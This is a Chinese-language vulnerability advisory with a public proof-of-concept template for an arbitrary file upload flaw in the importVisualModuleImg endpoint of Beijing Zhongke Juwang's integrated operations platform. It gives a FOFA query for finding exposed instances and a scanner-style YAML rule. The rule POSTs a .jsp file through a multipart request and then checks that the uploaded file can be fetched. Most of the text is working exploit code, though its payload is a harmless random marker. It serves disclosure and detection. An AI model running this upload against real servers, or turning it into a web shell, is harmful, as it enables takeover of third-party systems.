漏洞描述
北京中科聚网信息技术有限公司的一体化运营平台是一个综合性的信息系统,旨在为企业或机构提供全方位的运营支持和管理服务。北京中科聚网信息技术有限公司一体化运营平台importVisualModuleImg接口存在文件上传漏洞,攻击者可利用此漏洞上传任意文件获取服务器权限。
fofa:title="一体化运营平台" || body="thirdparty/ueditor/WordPaster"
zhongkejuwang-importvisualmoduleimg-fileupload: 北京中科聚网一体化运营平台importVisualModuleImg接口存在文件上传漏洞
PoC代码[已公开]
id: zhongkejuwang-importvisualmoduleimg-fileupload
info:
name: 北京中科聚网一体化运营平台importVisualModuleImg接口存在文件上传漏洞
author: avic123
severity: critical
verified: true
description: |
北京中科聚网信息技术有限公司的一体化运营平台是一个综合性的信息系统,旨在为企业或机构提供全方位的运营支持和管理服务。北京中科聚网信息技术有限公司一体化运营平台importVisualModuleImg接口存在文件上传漏洞,攻击者可利用此漏洞上传任意文件获取服务器权限。
fofa:title="一体化运营平台" || body="thirdparty/ueditor/WordPaster"
reference:
- https://cn-sec.com/archives/2994211.html
tags: zhongkejuwang,fileupload
created: 2025/03/13
set:
hostname: request.url.host
randstr: randomLowercase(8)
rboundary: randomLowercase(8)
rules:
r0:
request:
method: POST
path: /manage/tplresource/importVisualModuleImg?moduleId=2
headers:
Content-Type: multipart/form-data; boundary=--------{{rboundary}}
body: |
----------{{rboundary}}
Content-Disposition: form-data; name="file";filename="{{randstr}}.jsp"
{{randstr}}
----------{{rboundary}}--
expression: response.status == 200 && response.body.bcontains(b'"pubUrl":')
output:
search: '"\"pubUrl\":\"(?P<pubUrl>.*?)\"".bsubmatch(response.body)'
pubUrl: search["pubUrl"]
r1:
request:
method: GET
path: /{{pubUrl}}
expression: response.status == 200 && response.body.bcontains(bytes(randstr))
expression: r0() && r1()